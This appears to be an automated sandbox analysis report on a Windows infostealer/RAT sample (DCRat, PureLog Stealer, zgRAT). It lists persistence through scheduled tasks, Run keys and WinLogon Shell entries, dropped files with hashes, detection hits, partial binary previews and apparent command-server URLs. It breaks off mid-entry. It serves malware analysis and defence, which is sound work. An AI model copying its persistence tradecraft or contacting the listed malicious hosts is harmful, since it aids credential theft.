                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:544WP3NHaP.exe
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:50abe040b81818bf7ece156a10dbbbc9.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.spre.troj.spyw.expl.evad.winEXE@48/46@1/1
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 30%
                                                                                                            HCA Information:Failed
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe, SearchApp.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 20.109.210.53, 184.28.90.27, 13.107.246.45
                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target bridgeportDhcpcommon.exe, PID 2536 because it is empty
                                                                                                            • Execution Graph export aborted for target bridgeportDhcpcommon.exe, PID 5576 because it is empty
                                                                                                            • Execution Graph export aborted for target bridgeportDhcpcommon.exe, PID 5664 because it is empty
                                                                                                            • Execution Graph export aborted for target iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, PID 3336 because it is empty
                                                                                                            • Execution Graph export aborted for target iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, PID 6172 because it is empty
                                                                                                            • Execution Graph export aborted for target iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, PID 6232 because it is empty
                                                                                                            • Execution Graph export aborted for target iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, PID 744 because it is empty
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            15:47:25API Interceptor37572x Sleep call for process: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe modified
                                                                                                            20:47:18Task SchedulerRun new task: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ path: "C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                            20:47:19Task SchedulerRun new task: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi path: "C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                            20:47:19Task SchedulerRun new task: SearchApp path: "C:\Recovery\SearchApp.exe"
                                                                                                            20:47:19Task SchedulerRun new task: SearchAppS path: "C:\Recovery\SearchApp.exe"
                                                                                                            20:47:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SearchApp "C:\Recovery\SearchApp.exe"
                                                                                                            20:47:21Task SchedulerRun new task: bridgeportDhcpcommon path: "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
                                                                                                            20:47:21Task SchedulerRun new task: bridgeportDhcpcommonb path: "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
                                                                                                            20:47:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                            20:47:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommon "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
                                                                                                            20:47:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SearchApp "C:\Recovery\SearchApp.exe"
                                                                                                            20:47:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                            20:48:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommon "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
                                                                                                            20:48:08AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SearchApp "C:\Recovery\SearchApp.exe"
                                                                                                            20:48:17AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                            20:48:25AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommon "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
                                                                                                            20:48:42AutostartRun: WinLogon Shell "C:\Recovery\SearchApp.exe"
                                                                                                            20:48:50AutostartRun: WinLogon Shell "C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                            20:48:58AutostartRun: WinLogon Shell "C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                            20:49:07AutostartRun: WinLogon Shell "C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            172.67.220.198F3ePjP272h.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 328579cm.renyash.ru/VmMulti.php
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                            • 749858cm.renyash.ru/javascriptrequestApiBasePrivate.php

                                                                                                            Domains

                                                                                                            No context

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            CLOUDFLARENETUSKRNL.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.157.254
                                                                                                            01012025.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.198.102
                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.112.1
                                                                                                            test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.21.16
                                                                                                            test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.21.16
                                                                                                            web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                            • 188.114.96.3
                                                                                                            test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.21.16
                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 188.114.97.3
                                                                                                            qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.219.133

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Users\user\Desktop\AjJOuhvp.logeP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              1znAXdPcM5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  U1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    voed9G7p5s.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                        KzLetzDiM8.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                          f3I38kv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                            aimware.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                              ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\logs\8e809f57164876

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with very long lines (705), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):705
                                                                                                                                Entropy (8bit):5.878716043521497
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:oI6zf8SSts0HdcQitIgCgjyxxAMGrWZKI1OiB2CPzsWw+2RbatLWQWpmyOQa4jn:xs0h9c3tjCMexhGCZ/I02Ksw2AtyQgqu
                                                                                                                                MD5:1C0F9813BA8160CBC8792AB5D19BB220
                                                                                                                                SHA1:C6E2A9432A1FE848F7991862771400D4C2583378
                                                                                                                                SHA-256:E28EC34BAE57BFFD9AA114597DBBDFEBD26B16BE66500AEB1D3A15B87D0A6CF0
                                                                                                                                SHA-512:A439C6B4367A386E52ABB16DAC044E9E33C36279D846D5A76C69C6C58A7A9150117CCF2DAA21A156DA89251860085E2DAB147BA23FFDF27EB5B918E22ABFFA26
                                                                                                                                Malicious:false
                                                                                                                                Preview:QtgPrFlRuIVM1kAzptDiagIUCUgchYxtNmeEd2zq1ie8U5VZVmItCZQulLMWjItVUm9OF6Ww4Wr2BJAG9GH5QDqxWudSqcGsyInr6GUYQVzprXsbLGWcAyER6M2UdDGbP9E2fSK2wto4OBF8CBHjGns9EWvtO95MPXZsTz525eqRKJD4H3Rb6gVlRFyJhanwxcp0lWpNGOol7az4T0mUsePsBxbOAwUf04ereMTuODUr2to0P4zqySDTM7yx5bNU3JvC6HaHg2GoJhzSJk8F6oqh1KfgXgzx0Ayt8m4IesJ6MZKoIgoUcHYPcOKvm3tACTxItFTgqzlNeuUbA0Y02fUsmiRtbIgk8J33lB5CMHnngKvr3tvvf3Ih8FgLykEhTAPU1b094Wnu1rMcwkzsXuFFAV4gfuNmCFTg5a0c2w1JPYqR3EYOuWKj5JUfhUeKIBrvXpgWtX0l350mpmmaV92q5tkvGU4iSqAOq43NhCeWgjq9Tr04rDzJJA0oEvPZcRTM4l5usZ3SefKWDlbYd90O01EpEPIvwE3OPdErvFMRJgon0ekdU05dbEVDhPqcQHfZl5GkgtmYxiFUMbzkppb6JaxLHBKfZtABAPB4XA6kNhp29B0FaGxlqjQLI5cfiH9DhDT7Z4Mos0slv5LFKEFT5ZUa80vchaBGilU5s3qf3I201oaNtWVdBpIIs28iI

                                                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1913344
                                                                                                                                Entropy (8bit):7.53887100759396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:unUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0:unV5FiKlvbyOd
                                                                                                                                MD5:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                SHA1:D83C575DC2621B593918660EEC03CE077D5FAC39
                                                                                                                                SHA-256:565BB537A0AA8344D7AFAC9DD87DAB20AD33CF09B5F833476EE6C00BFDC938DC
                                                                                                                                SHA-512:96DA7384FB9A2B494077E0CF6CB5E0F4FC11C57B9F3ACD1E3E0F5549F22938056FEC4EDA5B9D0D7B773AFFAD9BF99D03A1C782A74E480A0830D63C3296C7AD18
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....og.................*..........nI... ...`....@.. ....................................@................................. I..K....`.. ............................................................................ ............... ..H............text...t)... ...*.................. ..`.rsrc... ....`.......,..............@....reloc...............0..............@..B................PI......H.......l...8................s...H.......................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~....{y...9....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{}...:....& ....8y......0.......... ........8........E........F.......R...f.......8........~....(K...~....(O... ....?*... ....~....{....:....& ....8....r...ps....z*~....9.... ....8}......... ....~....{....9c...& ....8X...~....(C... .... .... ....s....~....(G.

                                                                                                                                C:\Program Files\Windows Portable Devices\8e809f57164876

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with very long lines (807), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):807
                                                                                                                                Entropy (8bit):5.888992013397037
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:7s3cMdhk1TkxzgS7fO0fAf9HRqMHI2vi4dbC5zvl7ntQc:kcM/jxUt0fA1HRpbfG55
                                                                                                                                MD5:42E9635B62421308E6840C76535EAAE8
                                                                                                                                SHA1:971BF7B8B55D6BE43A5069F89E9E25E1B9E7945D
                                                                                                                                SHA-256:6728694CB3C8792C6309887FF7DE34C38081BFAC9286142F6B5A3F93BECFF4CF
                                                                                                                                SHA-512:3EACAC6668A55CA01A5C5593F94A7B2BA12B580958B12E9320AEA074CE890E88718871ED78DA37698E4675B7B5F72165207474415767D6B2E4745CF28403F2E6
                                                                                                                                Malicious:false
                                                                                                                                Preview:Z7CMwzoO5M9O0fBUCSv54q5pGBpfIsuQbEpcyFaUKitCgQvUVHQaD73tBXGvKIFMcsxw0ig61avV62IzPVJBcUNdL5ba8pKBchkxd9ewlTimMhwIORfy8EuHfTl4HF8MPt3ZRVVQ1WaIvkRnISMrJVDYxcSKYjofVWWcoX036O7lolW4B7vz2RC3qelzCK2Rr4xYNz9ubTv5YbtLGXIaxzmEUcvJwB0vWq3tx7rM8AYjgHfPvZspBbd2StEuDz8Zd9ish9YIq6cxaCiN7gYWSKt5MAbE36IJC9GgixrvBk9F9qcPL0xgbmGSPnfhiTOuxTua6BpJzmUsLo5giL2DImrZ3xQ4SJNrWOSp5CSJLoryRYGlr99WbKlLlVhJuu0pZnW6WPkf3t2d42IfrpNSK1QLmGEkeJYbxBZnCJPbYdcrSIQsMCcFgheiXKTPLABtUbp2dechZv4rYi2e0VYcrT4Qh1Q1zAQYctX1cXPrj4pvnwKySzYzmiCAhZVlOlrZefPoKBBcGq3wnImurcjAlbw3qWUDBnd7NQRHhfnRx6t5pQXYxl4vCryDtW8xq8adN5jW1eNMyRMpr0Oa95Qasr5fcNYLgzkzfPstqAhSYs7ufJV2Hiyur9ufAD4nGBp8rWJcIet8Y8C9uKAT2gD8BzHffMtmF4MWD8DI93tnzzWt7uvzDlvk8r71Pn66uG3evq6vG2T8waJLdXiua3jeImYVBM2V6w2s618RxAtLSwxiivX1FLg1hYVJSlt497B9haPlZQ7ZKYMVyzxQyBQvPBLhgy9MRyLUvxAHgvc

                                                                                                                                C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1913344
                                                                                                                                Entropy (8bit):7.53887100759396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:unUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0:unV5FiKlvbyOd
                                                                                                                                MD5:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                SHA1:D83C575DC2621B593918660EEC03CE077D5FAC39
                                                                                                                                SHA-256:565BB537A0AA8344D7AFAC9DD87DAB20AD33CF09B5F833476EE6C00BFDC938DC
                                                                                                                                SHA-512:96DA7384FB9A2B494077E0CF6CB5E0F4FC11C57B9F3ACD1E3E0F5549F22938056FEC4EDA5B9D0D7B773AFFAD9BF99D03A1C782A74E480A0830D63C3296C7AD18
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....og.................*..........nI... ...`....@.. ....................................@................................. I..K....`.. ............................................................................ ............... ..H............text...t)... ...*.................. ..`.rsrc... ....`.......,..............@....reloc...............0..............@..B................PI......H.......l...8................s...H.......................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~....{y...9....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{}...:....& ....8y......0.......... ........8........E........F.......R...f.......8........~....(K...~....(O... ....?*... ....~....{....:....& ....8....r...ps....z*~....9.... ....8}......... ....~....{....9c...& ....8X...~....(C... .... .... ....s....~....(G.

                                                                                                                                C:\Recovery\38384e6a620884

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with very long lines (530), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):530
                                                                                                                                Entropy (8bit):5.854548221275322
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:gkpRRp1ITrEDje3cr2Lz8tmF71dtVF2nGboRQFylVMRBwkZpyozzkRRICv:gkpR36PEkLz8t0XF2nGQ7MRBrsRRLv
                                                                                                                                MD5:3EBA3DEBEC47742F6858F2684370FCAF
                                                                                                                                SHA1:2CCAF540F2673EC6EF86FE24342140AA4DF0F8D3
                                                                                                                                SHA-256:F6D15B09D1BE8BEF23DAEDC34C502C110CDAC4CFA51DF1AC09F5EE85E17AC7AE
                                                                                                                                SHA-512:B0019D61C32B95E2E21FDF7FAFDB18A702461D59287F7A498714407EE38E5737E18FA57D8023C6395C4BD934DEDA8432915FEEF3AC7DCBFACAF965A5D3573CDB
                                                                                                                                Malicious:false
                                                                                                                                Preview:ejUaitKFiF2dLMz5IWJBkBQkQmd9FFcQUlNToHkB6MQgLpZDiVPMPv5dStJ6PLAcnmIj9fQAwIFXuuZkMZatzPAjquA47nvuMy3jh0ECEPaHphsiTit0uQmXlj3OeWCIXVL600DWVYpky33ICckZ4596Lf776zhsNRtUWvrdfXeWlCjspvMCvnOcVOuV2FZf06WgJjvQuH3ganVJ6PSLne7jDR8HAWkZ78fopCiG95SntrBs3lZnxO1V9wd2knQYhejbHqd3qMMsMT0VPQOZ67ltHJp2jqfVp4GOIjlNHf6lBJJp6HmUZ0bj30U7BkUAq0DSNlNppBRbAAr8AA6bEL5ydgVSPnMgL64LF1bU36pYjAj2IW6Ao26f4OzqP5aBzuPEFg2JilhHfhOc7dJ2rL2SAYQ0BuE8gojzuewmexcCUyAXAWtwvhUn16ErQBHxhjl17YscqhY3tz8LY20pBRM8U57xaFVdpofuNIalnQGOIa4C82SXKbwPXmhBa4CkL5OETN8PcOCvL8z3B5

                                                                                                                                C:\Recovery\SearchApp.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1913344
                                                                                                                                Entropy (8bit):7.53887100759396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:unUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0:unV5FiKlvbyOd
                                                                                                                                MD5:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                SHA1:D83C575DC2621B593918660EEC03CE077D5FAC39
                                                                                                                                SHA-256:565BB537A0AA8344D7AFAC9DD87DAB20AD33CF09B5F833476EE6C00BFDC938DC
                                                                                                                                SHA-512:96DA7384FB9A2B494077E0CF6CB5E0F4FC11C57B9F3ACD1E3E0F5549F22938056FEC4EDA5B9D0D7B773AFFAD9BF99D03A1C782A74E480A0830D63C3296C7AD18
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SearchApp.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SearchApp.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....og.................*..........nI... ...`....@.. ....................................@................................. I..K....`.. ............................................................................ ............... ..H............text...t)... ...*.................. ..`.rsrc... ....`.......,..............@....reloc...............0..............@..B................PI......H.......l...8................s...H.......................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~....{y...9....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{}...:....& ....8y......0.......... ........8........E........F.......R...f.......8........~....(K...~....(O... ....?*... ....~....{....:....& ....8....r...ps....z*~....9.... ....8}......... ....~....{....9c...& ....8X...~....(C... .... .... ....s....~....(G.

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bridgeportDhcpcommon.exe.log

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1396
                                                                                                                                Entropy (8bit):5.350961817021757
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                                MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                                SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                                SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                                SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                                Malicious:false
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:CSV text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):847
                                                                                                                                Entropy (8bit):5.354334472896228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                Malicious:false
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                                C:\Users\user\AppData\Local\Temp\3HKlYiBUaw

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                Encrypted:false
